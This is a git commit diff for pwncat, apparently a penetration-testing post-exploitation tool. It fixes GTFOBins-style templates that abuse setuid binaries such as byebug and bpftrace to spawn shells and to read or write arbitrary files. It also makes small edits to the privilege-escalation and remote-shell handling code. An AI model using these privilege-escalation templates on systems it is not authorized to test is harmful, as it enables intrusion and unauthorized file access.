Fixed errata from merge

2024-11-27 19:04:15 +01:00 · 2020-05-09 22:06:45 -04:00 · 2020-05-09 22:06:45 -04:00 · ac568f271f
commit ac568f271f
parent 010d09d795
4 changed files with 19 additions and 5 deletions
--- a/.byebug_history
+++ b/.byebug_history
@ -0,0 +1,6 @@
+continue
+!uit
+quit -y
+quit
+exit
+continue
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@ -85,7 +85,7 @@
 	{
 		"name": "bpftrace",
 		"shell": {
-			"script": "{command} -c {shell} -e 'END {{{{exit()}}}}'", 
+			"script": "{command} -c {shell} -e 'END {{exit()}}'", 
 			"suid": ["-p"]
 		}
 	},
@ -119,13 +119,16 @@
 	{
 		"name": "byebug",
 		"shell": {
-			"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} $TF",
-			"input": "continue\n"
+			"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command}  --no-stop -q $TF",
+			"need": [
+				"--no-stop",
+				"-q"
+			]
 		},
-		"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} $TF",
+		"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command}  --no-stop -q $TF",
 		"write_file": {
 			"type": "base64",
-			"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{command} $TF"
+			"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"
 		}
 	},
 	{
--- a/pwncat/privesc/setuid.py
+++ b/pwncat/privesc/setuid.py
@ -67,6 +67,7 @@ class SetuidMethod(Method):
        # Update the cache for the current user
        self.find_suid()

+        known_techniques = []
        for user, paths in self.suid_paths.items():
            for path in paths:
                binary = gtfobins.Binary.find(path)
@ -95,6 +96,7 @@ class SetuidMethod(Method):

        # Run the start commands
        self.pty.run(enter + "\n", wait=False)
+        # self.pty.process(enter, delim=False)

        # Send required input
        self.pty.client.send(input.encode("utf-8"))
--- a/pwncat/pty.py
+++ b/pwncat/pty.py
@ -795,6 +795,8 @@ class PtyHandler:

            response = self.recvuntil(b"_PWNCAT_ENDDELIM_")
            response = response.split(b"_PWNCAT_ENDDELIM_")[0]
+            if b"_PWNCAT_STARTDELIM_" in response:
+                response = b"\n".join(response.split(b"\n")[1:])

            if self.has_cr:
                self.recvuntil(b"\r\n")
@ -981,6 +983,7 @@ class PtyHandler:
            if line == "":
                continue
            line = line.strip().split(":")
+
            user_data = {
                "name": line[0],
                "password": None,